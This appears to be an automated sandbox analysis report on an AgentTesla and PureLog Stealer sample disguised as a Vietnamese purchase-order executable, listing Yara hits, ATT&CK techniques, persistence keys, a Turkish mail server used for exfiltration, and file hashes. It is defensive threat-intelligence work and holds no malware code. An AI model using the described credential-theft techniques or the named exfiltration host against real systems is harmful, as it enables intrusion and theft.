                      Source: Yara matchFile source: 00000006.00000002.1935883302.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 7128, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 3684, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 2676, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 3684, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.2cc398c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.2cc398c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1867946503.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder                      		12
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		31
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Registry Run Keys / Startup Folder                      		2
                      Obfuscated Files or Information                      		Security Account Manager221
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing                      		NTDS2
                      Process Discovery                      		Distributed Component Object Model31
                      Input Capture                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSH1
                      Clipboard Data                      		Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Hidden Files and Directories                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520405 Sample: PR 2500006515 #U2116 972 #U... Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 43 mail.yildiztepeenerji.com.tr 2->43 45 _kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr 2->45 47 2 other IPs or domains 2->47 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 11 other signatures 2->65 8 PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe 4 2->8         started        12 ctsdvwT.exe 3 2->12         started        14 ctsdvwT.exe 2 2->14         started        signatures3 process4 file5 39 PR 2500006515 #U21...O.,LTD 2024.exe.log, ASCII 8->39 dropped 67 Adds a directory exclusion to Windows Defender 8->67 16 PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe 1 5 8->16         started        21 powershell.exe 23 8->21         started        23 PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe 8->23         started        69 Multi AV Scanner detection for dropped file 12->69 71 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->71 73 Machine Learning detection for dropped file 12->73 75 Contains functionality to register a low level keyboard hook 12->75 25 ctsdvwT.exe 2 12->25         started        27 ctsdvwT.exe 14->27         started        29 ctsdvwT.exe 14->29         started        signatures6 process7 dnsIp8 41 mail.yildiztepeenerji.com.tr 77.245.148.65, 50358, 587 NIOBEBILISIMHIZMETLERITR Turkey 16->41 35 C:\Users\user\AppData\Roaming\...\ctsdvwT.exe, PE32 16->35 dropped 37 C:\Users\user\...\ctsdvwT.exe:Zone.Identifier, ASCII 16->37 dropped 49 Tries to steal Mail credentials (via file / registry access) 16->49 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->51 53 Installs a global keyboard hook 16->53 55 Loading BitLocker PowerShell Module 21->55 31 conhost.exe 21->31         started        33 conhost.exe 21->33         started        57 Tries to harvest and steal browser information (history, passwords, etc) 27->57 file9 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe71%ReversingLabsWin32.Trojan.AgentTesla
                      PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe71%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://aka.ms/pscore6lB0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.yildiztepeenerji.com.tr
                      		77.245.148.65
                      		truetrue
                        		unknown
                        241.42.69.40.in-addr.arpa
                        		unknown
                        		unknownfalse
                          		unknown
                          26.165.165.52.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		unknown
                            _kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr
                            		unknown
                            		unknownfalse
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://account.dyn.com/PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://mail.yildiztepeenerji.com.trPR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002BA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1867946503.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1948373451.0000000002A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    77.245.148.65
                                    		mail.yildiztepeenerji.com.trTurkey
                                    		42868NIOBEBILISIMHIZMETLERITRtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1520405
                                    Start date and time:2024-09-27 10:42:07 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 41s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:14
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:PR 2500006515 972 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@17/9@4/1
                                    EGA Information:
                                    • Successful, ratio: 85.7%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 209
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6980 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    04:43:02API Interceptor7001428x Sleep call for process: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe modified
                                    04:43:04API Interceptor11x Sleep call for process: powershell.exe modified
                                    04:43:14API Interceptor5827672x Sleep call for process: ctsdvwT.exe modified
                                    09:43:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                    09:43:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    77.245.148.65SKM_C3350i2402291223.bat.exeGet hashmaliciousAgentTeslaBrowse

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      NIOBEBILISIMHIZMETLERITRContract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                      • 77.245.159.9
                                      Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                      • 77.245.159.9
                                      https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.phpGet hashmaliciousUnknownBrowse
                                      • 77.245.159.21
                                      SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 77.245.159.7
                                      file.exeGet hashmaliciousSystemBCBrowse
                                      • 77.245.149.25
                                      #U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.245.148.100
                                      SKM_C3350i2402291223.bat.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.245.148.65
                                      Overdue Account Notice.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.245.159.10
                                      Product list.png.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.245.159.10
                                      NEW PURCHASE ORDER.png.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 77.245.159.10

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ctsdvwT.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1172
                                      Entropy (8bit):5.354777075714867
                                      Encrypted:false
                                      SSDEEP:24:3gWSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKIl9ia8Hu:QWSU4xympgv4RIoUP7mZ9tK8NDT
                                      MD5:EB8C2CED703FE31A6DAB409ABF320623
                                      SHA1:A7A9337EEBCEE8FF05DF4C76CB882356B7FF95C7
                                      SHA-256:3DFF0CCF5BEE6A7D0998C7CCF45D9DC4EB6C40EED9FE922EB9C87E0A0CE988DC
                                      SHA-512:547FC42688C26D319DF3820AD1BA17D288146FBDFA142904FB859BFCA9B18DD376315B94E7AC1C6779B568B52138D093A16B25DCDE3BE2AB6FC4DDD149898293
                                      Malicious:false
                                      Reputation:low
                                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cf5ns1ee.aql.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3tzu3xt.1xd.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0qdxlik.maa.psm1

                                      Download File
